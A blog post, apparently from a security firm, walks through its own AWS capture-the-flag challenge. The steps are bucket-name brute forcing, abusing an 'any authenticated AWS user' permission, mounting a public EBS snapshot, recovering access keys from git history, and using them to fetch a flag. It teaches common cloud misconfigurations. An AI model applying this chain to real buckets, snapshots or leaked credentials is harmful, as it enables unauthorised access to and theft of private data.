Recently SecuRing has prepared some fancy challenge before the conference CONFidence 2018. We’ve received so positive feedback from users (thnx!!!), that we’ve decided to keep alive the infrastructure of the challenge, so everybody still can check his hand at finding vulnerabilities in AWS. If you haven’t played it yet, please leave this article now (otherwise it spoils you everything) and go directly here to start the challenge. Share it amongst your friends and once you finish it (or get stuck and you don’t know what to do next) get back to this post. In this article you’ll read not only the walkthrough of the challenge but I’ll also explain what real problems I wanted to highlight.
3, 2, 1… Let’s get start it!
Let’s start from analyzing the challenge description and pull out only the important notes (in fact understanding what you read is the first task in this challenge :D ).
The important notes, which we can get from the challenge description are the followings: KRK Analytica uses AWS, they have more than one bucket, final flag “secret_codes.txt” is placed on “krkanalytica-confidential” bucket and Mike Shwarzberg has access keys to it.
As you may suspect trying access the final flag will result in getting the access denied message:
Ok, so it seems the sec guy Mike is not so dumb :) Next information we can deduce from the description is that they have more than one bucket. It’s quite common that people are using some patterns to create their buckets, like “example-prod”, “example-dev” etc.
Interesting thing here is the fact that anyone can name their bucket as they want. This may inducts some risks, e.g. cyber criminals can use it to phishing attacks (if a company broadly uses buckets “example-media” and “example-doc”, then it would be quite easy to convince an employee to download a file from “example-policies”).
There are available open source tools which performs such name permutations and automatically verifies if the bucket exists or not. Some of them are LazyS3, s3-buckets-bruteforcer, inSp3ctor. Let’s try the LazyS3. It works quite slowly, but it’s a perfect opportunity to take a break and grab some coffee :)
Once we’re back we can realize that the tool found 2 buckets: “krkanalytica-confidential” and “krkanalytica-backup”. The response code we get for both of them is 403 what means we have to be authenticated to access their content (or at least list buckets’ content). However, quite old problem related with S3 access control is giving an access to a group “any authenticated AWS user”.
“Any authenticated AWS user” is a group that a lot of administrators mistakenly interprets as this group gives permissions only to accounts under their root account. In fact, it gives access to absolutely any AWS account including those created on free tier :) Well… honestly I’ve never understood what is the purpose of this group. Nevertheless, this group is no longer available in AWS console (from the mid of 2017), however it still can be assigned, for example via AWS CLI.
So let’s try to access the “krkanalytica-backup” bucket via my free tier account:
Voila! Now we can access all the bucket’s content. Let’s download the whole content to your sandboxed environment (remember, it’s untrusted content and you don’t want fill up your disk):
Let’s go through the content. The folders “avatars” and “Offtop” contain only photos, which rather won’t reveal anything interesting. The “Blog” folder contains some Wordpress files and a file “users.sql”. As an author, I can say it’s just a blind path :) Similarly “HR” folder doesn’t contain anything interesting what helps to solve the challenge. The folder “Policies and docs” contains a subfolder “To read in nearest future” — well it’s just a troll message indicating that unfortunately still for too many people security is not a priority and they prefer to first deploy their infrastructure and later fix the security issues if any appears. However, this “later” often happens too late or even never.
In the “Website” folder there’s a copy of Cambridge Analytica’s webiste — it’s a funny accent indicating that the name “Krakow Analytica” refers to the recent Facebook’s affair ;) Finally we come to the folder “Tests”. The subfolder “Personal” contains a .zip archive which is password protected. Easy guessable password “123456” reveals some oldschool sex games — well seems Mike is an old perv :) Another thing which we can find in “Tests” folder is a repository of “Cloudsploit” — this is a really handy tool for performing security assessments of the AWS infrastructure.
However, administrators who blindly relies only on security tools forget that the tool will never gives 100% protection, because it will never catch all leaks. Remember that security tools are a great addition to your security process, but your infrastructure should be also a subject of manual assessment (security audits)!
Further analyze of “krkanalytica-backup” content will reveal some mails. You can find there a mail sent from Alice informing Mike about the open access to “krkanalytica-backup”. Unfortunately, my experience shows that most of administrators behaves exactly like Mike — they are simply ignoring such messages.
Among those mails there is an interesting one: “Re_ AWS Security Instance.eml” — it discloses an ID of public snapshot. The easiest way of sharing a snapshot is making it public.
But sometimes people forget that “public” means accessible for anyone not only their colleagues from work. Always ensure twice you don’t leave any sensitive data in public snapshots.
Having the snapshot ID we have to find a region of it to be able to mount it on our EC2 instance. Going through available regions you’ll finally find accessible snapshot in region “eu-west-1” or EU (Ireland). Here’s the URL:
Now, it’s time to mount the snapshot and see if anything interesting is inside. To do it you have to firstly create an EC2 instance (a free tier t2 micro instance with default settings will perfectly works here). To access the snapshot’s content you have to firstly create a volume from the snapshot (in AWS console: Service -> EC2 -> Volumes -> Create Volume and provide the snapshot ID you read in Mike’s email). Once the volume is created, now it’s time to attach it to our instance (in Volumes tab: Actions -> Attach volume and choose here your instance ID):
Then log in to your instance, find attached volume and mount it to your file system:
If you search the “home” folder you’ll quickly find the subfolder “AWS Tools”:
Folder “BucketScanner” looks interesting, doesn’t it? Inside you can find a modified code of BucketScanner, however nothing interesting inside :( But wait, if you search the catalog with ‘-a’ parameter then you will also see hidden files and folders and then you see a ‘.git’ folder. Git logs is a source of many key leaks, so let’s see if the logs of this repository contains anything interesting. To display all commits with their changes run the command
git log -p.
If you’re missing git on your instance then you can install it using command ‘sudo yum install git’.
Scanning big amounts of data can be very time consuming, so to automate this process I’ve developed the DumpsterDiver. This tool can automatically find the secret leak in any text file, archive or git object (git logs).
Sweeet, right? Now, it’s time for creating Mike’s profile in your AWS CLI and download the final flag:
The file “secret_codes.txt” ends this challenge. However if you open it you can see a QR code. If you resolve it you’ll see a gif of Mike Zuckerberg who is transmitting a hidden message in reptilian language. Any suggestions what could be the transmitted message? :)
Hope you like this challenge and you learnt something new. Remember that doing is the most effective way of learning, so stop reading and go through the challenge by yourself!
I’d be very happy to hear your feedback. Would you like to see more such cloud challenges? Let us know!